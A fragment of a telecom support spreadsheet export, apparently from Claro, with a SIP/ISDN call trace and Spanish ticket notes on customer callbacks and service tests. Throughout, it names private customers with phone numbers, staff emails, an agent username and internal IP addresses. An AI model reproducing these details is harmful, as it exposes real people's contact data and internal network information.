FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
CSEQ: 162490625 INVITE
ALLOW: INVITE, ACK, OPTIONS, CANCEL, BYE, INFO, PRACK, REGISTER, SUBSCRIBE, UPDATE
CONTENT-LENGTH: 0
L2: U 23/05/2022 13:45:39:670 SIPAPP: RECEIVING MSG "USERAGENT CALLINCOMING UACALLID D47814, REMOTE 10.173.75.129 PORTRXAUD 57620 PORTRXVID 0 CALLER +50497184720 CALLEE 25640300 CODEC G729A|G711A|G711U| PKT_TIME 0 PT_2833 97 PT_4040 0 T38EN 0 T38PORT 0 T38PROTOCOL 0 T38RATEMAN 0 T38UDPEC 0 T38_MAX_BUFFER 0 T38_MAX_DATAGRAM 0 T38_MAX_BIT_RATE 0 PRIVACY NONE PRESENTATION +50497184720 SOURCE_ADDR 179129217 SOURCE_PORT 5060" LEN: 370 FROM USERAGENT.
L1: U 23/05/2022 13:45:39:670 SIPAPP: SIP_2_IWF IND: CALLINCOMING HSCALL: D47814
L2: U 23/05/2022 13:45:39:670 IWFISDNPORT0: CALLED IWFPORT::STATEPROC(MSG 10 FROM SIP) STATE=3 SWAPFLAGS=(0 0)
D1:  19.670 OFISDN: ISDN D 1 RX:  02 01 4A A8 08 02 00 01 05 04 03 80 90 A3 18 03 A9 83 81 6C 0D 80 2B 35 30 34 39 37 31 38 34 37 32 30 70 09 80 32 35 36 34 30 33 30 30 7D 02 91 81
D1:  19.680 OFISDN: ISDN D 1 TX:  02 01 01 4C
D1:  19.690 OFISDN: ISDN D 1 TX:  00 01 A8 4C 08 02 80 01 02 18 03 A9 83 81
D1:  19.690 OFISDN: ISDN D 1 RX:  00 01 01 AA
D1:  19.700 OFISDN: ISDN D 1 TX:  00 01 AA 4C 08 02 80 01 7D 08 02 81 E4 14 01 09
D1:  19.700 OFISDN: ISDN D 1 RX:  00 01 01 AC
D1:  19.700 OFISDN: ISDN D 1 TX:  00 01 AC 4C 08 02 80 01 01
D1:  19.700 OFISDN: ISDN D 1 RX:  00 01 01 AE
L1: U 23/05/2022 13:45:39:700 SIPAPP: IWF_2_SIP CMD: RINGING HACALL: F4F038 HSCALL: D47814
L2: U 23/05/2022 13:45:39:700 SIPAPP: SENT 62 BYTES TO 127.0.0.1:53000
L2: U 23/05/2022 13:45:39:700 SIPAPP: [RINGING APCALLID F4F038 UACALLID D47814 REG_USERNAME 25640300]
L1: U 23/05/2022 13:45:39:700 COSLOG: SIP_UA_SERVER.C:349 I
RECEIVED FROM 127.0.0.1:1540
RINGING APCALLID F4F038 UACALLID D47814 REG_USERNAME 25640300
L1: U 23/05/2022 13:45:39:700 COSLOG: SIP_UA_COMMAND.C:1056 I
SENT TO 127.0.0.1:52000
USERAGENT COMMANDRESULT APCALLID F4F038 UACALLID D47814 COMMAND RINGING RETURNCODE 0
L1: U 23/05/2022 13:45:39:700 COSLOG: SIP_UA_MESSAGE.C:218 I
SENT TO 10.173.75.129:5060
SIP/2.0 180 RINGING
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BKAZ654ZE4B3A4CVVDCAHA5AOHE;ROLE=3;HPT=8E48_16
RECORD-ROUTE: &lt;SIP:10.173.75.129:5060;TRANSPORT=UDP;LR;HPT=8E48_16;CXTID=4;TRC=FFFFFFFF-FFFFFFFF;X-HWB2BUACOOKIE=212&gt;
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
CSEQ: 162490625 INVITE
CONTACT: &lt;SIP:25640300@10.3.2.194&gt;
REQUIRE: 100REL
RSEQ: 101
ALLOW: INVITE, ACK, OPTIONS, CANCEL, BYE, INFO, PRACK, REGISTER, SUBSCRIBE, UPDATE
CONTENT-LENGTH: 0
L2: U 23/05/2022 13:45:39:700 SIPAPP: RECEIVING MSG "USERAGENT COMMANDRESULT APCALLID F4F038 UACALLID D47814 COMMAND RINGING RETURNCODE 0" LEN: 84 FROM USERAGENT.
L1: U 23/05/2022 13:45:39:710 SIPAPP: SIP_2_IWF IND: COMMANDRESULT HSCALL: D47814
L1: U 23/05/2022 13:45:39:740 COSLOG: SIP_UA_SERVER.C:349 I
RECEIVED FROM 10.173.75.129:5060
PRACK SIP:25640300@10.3.2.194 SIP/2.0
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BK4CCO5THC9C5VTECVH9C4ZC4OA;ROLE=3;HPT=8E48_16
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CSEQ: 162490626 PRACK
MAX-FORWARDS: 69
RACK: 101 162490625 INVITE
CONTENT-LENGTH: 0
L1: U 23/05/2022 13:45:39:740 COSLOG: SIP_UA_MESSAGE.C:218 I
SENT TO 10.173.75.129:5060
SIP/2.0 200 OK
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BK4CCO5THC9C5VTECVH9C4ZC4OA;ROLE=3;HPT=8E48_16
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
CSEQ: 162490626 PRACK
CONTENT-LENGTH: 0
D1:  20.780 OFISDN: ISDN D 1 TX:  00 01 AE 4C 08 02 80 01 07 4C 06 21 80 34 30 39 30
D1:  20.780 OFISDN: ISDN D 1 RX:  00 01 01 B0
D1:  20.780 OFISDN: ISDN D 1 RX:  02 01 4C B0 08 02 00 01 0F
L1: U 23/05/2022 13:45:40:780 SIPAPP: IWF_2_SIP CMD: ACCEPT HSCALL: D47814
L2: U 23/05/2022 13:45:40:780 SIPAPP: SENT 261 BYTES TO 127.0.0.1:53000
L2: U 23/05/2022 13:45:40:780 SIPAPP: [ACCEPT APCALLID F4F038 UACALLID D47814 LOCALAUDRX 18000 LOCALVIDRX 0 CODEC G711A|G711U|UNKNOWN PKT_TIME 20 PT_2833 97 PT_4040 0 REG_USERNAME 25640300 T38EN 0 T38PORT 0 T38PROTOCOL 0 T38RATEMAN 0 T38UDPEC 0 T38_MAX_BUFFER 0 T38_MAX_DATAGRAM 0 T38_MAX_BIT_RATE 0]
L1: U 23/05/2022 13:45:40:780 COSLOG: SIP_UA_SERVER.C:349 I
RECEIVED FROM 127.0.0.1:1540
ACCEPT APCALLID F4F038 UACALLID D47814 LOCALAUDRX 18000 LOCALVIDRX 0 CODEC G711A|G711U|UNKNOWN PKT_TIME 20 PT_2833 97 PT_4040 0 REG_USERNAME 25640300 T38EN 0 T38PORT 0 T38PROTOCOL 0 T38RATEMAN 0 T38UDPEC 0 T38_MAX_BUFFER 0 T38_MAX_DATAGRAM 0 T38_MAX_BIT_RATE 0
L1: U 23/05/2022 13:45:40:780 COSLOG: SIP_UA_COMMAND.C:1056 I
SENT TO 127.0.0.1:52000
USERAGENT COMMANDRESULT APCALLID F4F038 UACALLID D47814 COMMAND ACCEPT RETURNCODE 0
L1: U 23/05/2022 13:45:40:780 COSLOG: SIP_UA_MESSAGE.C:218 I
SENT TO 10.173.75.129:5060
SIP/2.0 200 OK
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BKAZ654ZE4B3A4CVVDCAHA5AOHE;ROLE=3;HPT=8E48_16
RECORD-ROUTE: &lt;SIP:10.173.75.129:5060;TRANSPORT=UDP;LR;HPT=8E48_16;CXTID=4;TRC=FFFFFFFF-FFFFFFFF;X-HWB2BUACOOKIE=212&gt;
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
CSEQ: 162490625 INVITE
CONTACT: &lt;SIP:25640300@10.3.2.194&gt;
SUPPORTED: 100REL
CONTENT-TYPE: APPLICATION/SDP
ALLOW: INVITE, ACK, OPTIONS, CANCEL, BYE, INFO, PRACK, REGISTER, SUBSCRIBE, UPDATE
CONTENT-LENGTH: 215
V=0
O=AETHRA 1 2 IN IP4 10.3.2.194
S=SBC CALL
C=IN IP4 10.3.2.194
T=0 0
M=AUDIO 18000 RTP/AVP 8 0 97
A=RTPMAP:8 PCMA/8000
A=RTPMAP:0 PCMU/8000
A=RTPMAP:97 TELEPHONE-EVENT/8000/1
A=FMTP:97 0-15
A=PTIME:20
L2: U 23/05/2022 13:45:40:780 SIPAPP: RECEIVING MSG "USERAGENT COMMANDRESULT APCALLID F4F038 UACALLID D47814 COMMAND ACCEPT RETURNCODE 0" LEN: 83 FROM USERAGENT.
L1: U 23/05/2022 13:45:40:780 SIPAPP: SIP_2_IWF IND: COMMANDRESULT HSCALL: D47814
D1:  20.790 OFISDN: ISDN D 1 TX:  02 01 01 4E
L1: U 23/05/2022 13:45:40:850 COSLOG: SIP_UA_SERVER.C:349 I
RECEIVED FROM 10.173.75.129:5060
ACK SIP:25640300@10.3.2.194 SIP/2.0
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BK9C43OZ6C69A6ZTB94OG5566AG;ROLE=3;HPT=8E48_16
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CSEQ: 162490625 ACK
MAX-FORWARDS: 69
CONTENT-LENGTH: 0
L1: U 23/05/2022 13:45:40:850 COSLOG: SIP_UA_SERVER.C:349 I
RECEIVED FROM 10.173.75.129:5060
INVITE SIP:25640300@10.3.2.194 SIP/2.0
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BKEVAOEBTO3VTD4GH3654TGGH3A;ROLE=3;HPT=8E48_16
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CSEQ: 162490627 INVITE
ACCEPT: APPLICATION/SDP
ALLOW: INVITE,ACK,OPTIONS,BYE,CANCEL,UPDATE
CONTACT: &lt;SIP:HNPRO1M.MSS.CLARO.COM.HN:5060;TRANSPORT=UDP;HPT=8E48_16;CXTID=4;TRC=FFFFFFFF-FFFFFFFF&gt;
MAX-FORWARDS: 69
P-CHARGING-VECTOR: ICID-VALUE=0C3BF2A000-0523-12420900;ICID-GENERATED-AT=HNPRO1M.MSS.CLARO.COM.HN
CONTENT-LENGTH: 243
CONTENT-TYPE: APPLICATION/SDP
V=0
O=- 15025637 15025638 IN IP4 10.173.75.129
S=SBC CALL
C=IN IP4 10.173.75.129
T=0 0
A=SENDRECV
M=AUDIO 57620 RTP/AVP 8 97
C=IN IP4 10.173.75.129
A=RTPMAP:8 PCMA/8000
A=RTPMAP:97 TELEPHONE-EVENT/8000
A=FMTP:97 0-15
A=MAXPTIME:40
L1: U 23/05/2022 13:45:40:850 COSLOG: SIP_UA_COMMAND.C:1056 I
SENT TO 127.0.0.1:52000
USERAGENT REINVITEINCOMING APCALLID F4F038 UACALLID D47814, REMOTE 10.173.75.129 PORTRXAUD 57620 PORTRXVID 0 CALLER +50497184720 CALLEE 25640300 CODEC G711A| PKT_TIME 0 PT_2833 97 PT_4040 0 MEDIA_ATTR 0 T38EN 0 T38PORT 0 T38PROTOCOL 0 T38RATEMAN 0 T38UDPEC 0 T38_MAX_BUFFER 0 T38_MAX_DATAGRAM 0 T38_MAX_BIT_RATE 0 PRIVACY NONE PRESENTATION +50497184720
L1: U 23/05/2022 13:45:40:850 COSLOG: SIP_UA_MESSAGE.C:218 I
SENT TO 10.173.75.129:5060
SIP/2.0 100 TRYING
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BKEVAOEBTO3VTD4GH3654TGGH3A;ROLE=3;HPT=8E48_16
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
CSEQ: 162490627 INVITE
ALLOW: INVITE, ACK, OPTIONS, CANCEL, BYE, INFO, PRACK, REGISTER, SUBSCRIBE, UPDATE
CONTENT-LENGTH: 0
L2: U 23/05/2022 13:45:40:850 SIPAPP: RECEIVING MSG "USERAGENT REINVITEINCOMING APCALLID F4F038 UACALLID D47814, REMOTE 10.173.75.129 PORTRXAUD 57620 PORTRXVID 0 CALLER +50497184720 CALLEE 25640300 CODEC G711A| PKT_TIME 0 PT_2833 97 PT_4040 0 MEDIA_ATTR 0 T38EN 0 T38PORT 0 T38PROTOCOL 0 T38RATEMAN 0 T38UDPEC 0 T38_MAX_BUFFER 0 T38_MAX_DATAGRAM 0 T38_MAX_BIT_RATE 0 PRIVACY NONE PRESENTATION +50497184720" LEN: 352 FROM USERAGENT.
L1: U 23/05/2022 13:45:40:860 SIPAPP: SIP_2_IWF IND: REINVITEINCOMING HSCALL: D47814
L2: U 23/05/2022 13:45:40:860 IWFISDNPORT0: CALLED IWFPORT::STATEPROC(MSG 11 FROM SIP) STATE=3 SWAPFLAGS=(0 0)
L1: U 23/05/2022 13:45:40:860 SIPAPP: IWF_2_SIP CMD: REINVITERESP HSCALL: D47814
L2: U 23/05/2022 13:45:40:860 SIPAPP: SENT 285 BYTES TO 127.0.0.1:53000
L2: U 23/05/2022 13:45:40:860 SIPAPP: [REINVITERESP APCALLID F4F038 UACALLID D47814 RESPONSE_OK 1 SIP_FAILURE_CODE 0 LOCALAUDRX 18000 LOCALVIDRX 0 CODEC G711A|UNKNOWN PKT_TIME 20 PT_2833 97 PT_4040 0 MEDIA_ATTR 0 T38EN 0 T38PORT 0 T38PROTOCOL 0 T38RATEMAN 0 T38UDPEC 0 T38_MAX_BUFFER 0 T38_MAX_DATAGRAM 0 T38_MAX_BIT_RATE 0]
L1: U 23/05/2022 13:45:40:860 COSLOG: SIP_UA_SERVER.C:349 I
RECEIVED FROM 127.0.0.1:1540
REINVITERESP APCALLID F4F038 UACALLID D47814 RESPONSE_OK 1 SIP_FAILURE_CODE 0 LOCALAUDRX 18000 LOCALVIDRX 0 CODEC G711A|UNKNOWN PKT_TIME 20 PT_2833 97 PT_4040 0 MEDIA_ATTR 0 T38EN 0 T38PORT 0 T38PROTOCOL 0 T38RATEMAN 0 T38UDPEC 0 T38_MAX_BUFFER 0 T38_MAX_DATAGRAM 0 T38_MAX_BIT_RATE 0
L1: U 23/05/2022 13:45:40:860 COSLOG: SIP_UA_COMMAND.C:1056 I
SENT TO 127.0.0.1:52000
USERAGENT COMMANDRESULT APCALLID F4F038 UACALLID D47814 COMMAND REINVITERESP RETURNCODE 0
L1: U 23/05/2022 13:45:40:860 COSLOG: SIP_UA_MESSAGE.C:218 I
SENT TO 10.173.75.129:5060
SIP/2.0 200 OK
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BKEVAOEBTO3VTD4GH3654TGGH3A;ROLE=3;HPT=8E48_16
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
CSEQ: 162490627 INVITE
CONTACT: &lt;SIP:25640300@10.3.2.194&gt;
CONTENT-TYPE: APPLICATION/SDP
ALLOW: INVITE, ACK, OPTIONS, CANCEL, BYE, INFO, PRACK, REGISTER, SUBSCRIBE, UPDATE
CONTENT-LENGTH: 191
V=0
O=AETHRA 1 2 IN IP4 10.3.2.194
S=SBC CALL
C=IN IP4 10.3.2.194
T=0 0
M=AUDIO 18000 RTP/AVP 8 97
A=RTPMAP:8 PCMA/8000
A=RTPMAP:97 TELEPHONE-EVENT/8000/1
A=FMTP:97 0-15
A=PTIME:20
L2: U 23/05/2022 13:45:40:860 SIPAPP: RECEIVING MSG "USERAGENT COMMANDRESULT APCALLID F4F038 UACALLID D47814 COMMAND REINVITERESP RETURNCODE 0" LEN: 89 FROM USERAGENT.
L1: U 23/05/2022 13:45:40:860 SIPAPP: SIP_2_IWF IND: COMMANDRESULT HSCALL: D47814
L1: U 23/05/2022 13:45:40:870 COSLOG: SIP_UA_SERVER.C:349 I
RECEIVED FROM 10.173.75.129:5060
ACK SIP:25640300@10.3.2.194 SIP/2.0
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BKZACVV9VGO3ECTVZT6ZAZT5G63;ROLE=3;HPT=8E48_16
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CSEQ: 162490627 ACK
MAX-FORWARDS: 69
CONTENT-LENGTH: 0
D1:  30.790 OFISDN: ISDN D 1 TX:  00 01 01 4F
D1:  30.790 OFISDN: ISDN D 1 RX:  00 01 01 B1
D1:  40.800 OFISDN: ISDN D 1 TX:  00 01 01 4F
D1:  40.800 OFISDN: ISDN D 1 RX:  00 01 01 B1
D1:  44.690 OFISDN: ISDN D 1 TX:  00 01 B0 4E 08 02 80 01 6E 27 01 F9
D1:  44.690 OFISDN: ISDN D 1 RX:  00 01 01 B2
D1:  54.690 OFISDN: ISDN D 1 TX:  00 01 01 4F
D1:  54.690 OFISDN: ISDN D 1 RX:  00 01 01 B3
D1:  63.980 OFISDN: ISDN D 1 TX:  00 01 B2 4E 08 02 80 01 6E 27 01 FA
D1:  63.980 OFISDN: ISDN D 1 RX:  00 01 01 B4
L1: U 23/05/2022 13:46:26:670 COSLOG: SIP_UA_SERVER.C:349 I
RECEIVED FROM 10.173.75.129:5060
BYE SIP:25640300@10.3.2.194 SIP/2.0
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BK4AZT9BE3AVOC5VTODAADVC55H;ROLE=3;HPT=8E48_16
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CSEQ: 162490628 BYE
MAX-FORWARDS: 69
REASON: Q.850;CAUSE=16
CONTENT-LENGTH: 0
L1: U 23/05/2022 13:46:26:670 COSLOG: SIP_UA_MESSAGE.C:218 I
SENT TO 10.173.75.129:5060
SIP/2.0 200 OK
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BK4AZT9BE3AVOC5VTODAADVC55H;ROLE=3;HPT=8E48_16
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=4195754189
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
CSEQ: 162490628 BYE
CONTENT-LENGTH: 0</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EN SU IDENTIFICADOR CADA VEZ QUE LE MARCAN DESDE TIGO SE OBSERVA UNICAMENTE UN  SIGNO ASTERISCO EN EL IDENTIFICADOR- UNICAMENTE SUCEDE CON LLAMDAS DE TIGO- CLIENTE NO POSEE TELEFONO DE TIGO, NI PERSONAL  A SUC ARGO TIENE TELEFONO DE TIGO PARA REALIZAR PRUEBAS EN ESTE MOMENTO- POR LO QUE SE COLOCARA UNA TRAZA Y SE LLAMARA EN 1 HORA A CLIENTE PARA VERIFICAR SI A CLIENTE LE HA LLAMADO ALGUIEN DE TIGO Y PODER COMPARAR EN LA TRAZA ## CIC</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE   BESSY LOPEZ-89913904
1001630322
COLA:
NOMBRE: A: 0050489913904
NÚMERO: 0050489913904
DURACIÓN: 0:00:07
ESTADO: MARCANDO
DETALLES: 0050489913904
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/05/2022 11:09:17</t>
  </si>
  <si>
    <t>F4574370</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 14:00 HORAS A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROCIO RAMIREZ 41063909 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001699390</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE ROCIO RAMIREZ 41063909 SIGUE SIN RESPONDER
-ID 1001722229 - 1001722676</t>
  </si>
  <si>
    <t>F4574377</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO DOMINGUEZ 47781831 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
- ID  1001626930</t>
  </si>
  <si>
    <t>F4574379</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL CAMPOS 70700664 INDICA QUE ESTAN COMPLETAMENTE SIN SISTEMA Y QUE NO ESTA DE ACUERDO CON LA VISITA PARA MAÑANA  SE LE INDICA QUE TEC ESTA A 6 HRS DEL LUGAR Y MAS EL TIEMPO QUE SE TARDARAN EN REVISAR PERO CL DICE QUE NO IMPORTA QUE SE LE VISITE HOY .
ID 1001646627 - 1001648288
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL CAMPOS AL 70700664 INDICA QUE ESTA BIEN QUE YA ESTAN ESPERANDO A LOS
 TECNICOS EN SITIO **
ID 1001683124
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL CAMPOS AL 70700664 CLIENTE CONFIRMA SERVICO ESTABLE Y OPERATIVO   **
ID 1001842424
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 70700804 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001810274
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL CAMPOS AL 70700664 NO RESPONDE,  ENVIA A BUZON SE INTENTARA LUEGO  **
ID 1001824936
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL CAMPOS AL 70700664 INDICA QUE REVISARA Y QUE SE LE LLAME EN 30 MIN NUEVAMENTE **
ID 1001810982
**</t>
  </si>
  <si>
    <t>F4574387</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE POSADA AL 0050433534921 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001699675
**</t>
  </si>
  <si>
    <t>F4574392</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY MARTINEZ 40330527 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001634701</t>
  </si>
  <si>
    <t>F4574394</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE   KATHYA HERNADEZ-60239809  INDICA QUE EL REPORTE ES QUE TINE PROBLEMAS PARA MARCAR ESPECIFICAMENTE HACIA UN NUMERO FIJO- SE LE PIDE APOYO PARA REALIZAR PRUEBAS Y LA LLAMADA COMPLETA ## A NIVEL DE CLARO TODO O- ## PIDE VALIDAR A LAS 12 ##CIC + ##VIVO (POR QUE CLIENTE NO NOS ESCUCHABA CON EL CIC
1001622991
COLA:
NOMBRE: A: 0050360239809
NÚMERO: 0050360239809
DURACIÓN: 0:00:03
ESTADO: MARCANDO
DETALLES: 0050360239809
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/05/2022 10:52:16</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  KATHYA HERNADEZ-60239809  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001715499 - 1001715798</t>
  </si>
  <si>
    <t>SE PROCEDE AL CIERRE DEL TICKET ## CLIENTE E KATHYA HERNADEZ 25240000   REPORTARA CUANDO TENGA EL INCONVENIENTE ##VIVO ##</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE KATHYA HERNADEZ-60239809/25240038 A LOS DOS NUMEROS,, 2 VECES ##ENVIA DIRECTO A BUZON ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  KATHYA HERNADEZ-60239809 COMENTA QUE NO HA PODIDO REALIZAR PRUEBAS- SE VALIDARA A LAS 3PM ##CIC
1001662984
COLA:
NOMBRE: A: 0050360239809
NÚMERO: 0050360239809
DURACIÓN: 0:00:57
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050360239809
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/05/2022 12:33:13
1001660734
COLA:
NOMBRE: A: 0050360239809
NÚMERO: 0050360239809
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050360239809
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/05/2022 12:26:02
1001660953
COLA:
NOMBRE: A: 0050325240038
NÚMERO: 0050325240038
DURACIÓN: 0:00:13
ESTADO: MARCANDO
DETALLES: 0050325240038
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/05/2022 12:26:10</t>
  </si>
  <si>
    <t>F4574398</t>
  </si>
  <si>
    <t>SE LLAMO A HUGO QUIEN INDICA QUE ESTARA DEVOLVIENDO LLAMADA PARA REALIZAR NUEVAMENTE PRUEBAS---</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 12:26
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; HUGO.HERNANDEZ@INTEAP.EDU.GT &lt;HUGO.HERNANDEZ@INTEAP.EDU.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: PRUEBAS DEL SERVICIO INSTITUTO TECNICO DE CAPACITACION Y PRODUCTIVIDAD-INTECAP- || 826900021 || SD1128247
*-*-*-*-*-</t>
  </si>
  <si>
    <t>SE PROCEDIO A LLAMAR A HUGO PARA INFORMARLE DE LAS ACCIONES REALIZADAS Y SI ES POSIBLE REALIZAR PRUEBAS.--- SIN EMBARGO NO RESPONDE ---
-&gt;&gt;&gt;SE LE DEBE DE INDICAR QUE SE QUITO LA LIMITANTE EN EL FORTINET Y QUE SE AGREGO LA LIMITANTE EN EL PE.
- &gt;&gt;&gt;SE LE DEBE DE INDICAR QUE REALICE PRUEBAS (CLIENTE INDICA PROBLEMAS DE ANCHO DE BANDA).-</t>
  </si>
  <si>
    <t>SE PROCEDIO A LLAMAR A HUGO PARA INFORMARLE DE LAS ACCIONES REALIZADAS Y SI ES POSIBLE REALIZAR PRUEBAS.---
-&gt;&gt;&gt;SE LE DEBE DE INDICAR QUE SE QUITO LA LIMITANTE EN EL FORTINET Y QUE SE AGREGO LA LIMITANTE EN EL PE.
- &gt;&gt;&gt;SE LE DEBE DE INDICAR QUE REALICE PRUEBAS (CLIENTE INDICA PROBLEMAS DE ANCHO DE BANDA).-</t>
  </si>
  <si>
    <t>F4574413</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE AURA CABRERA 42758665 ID: 1001649812
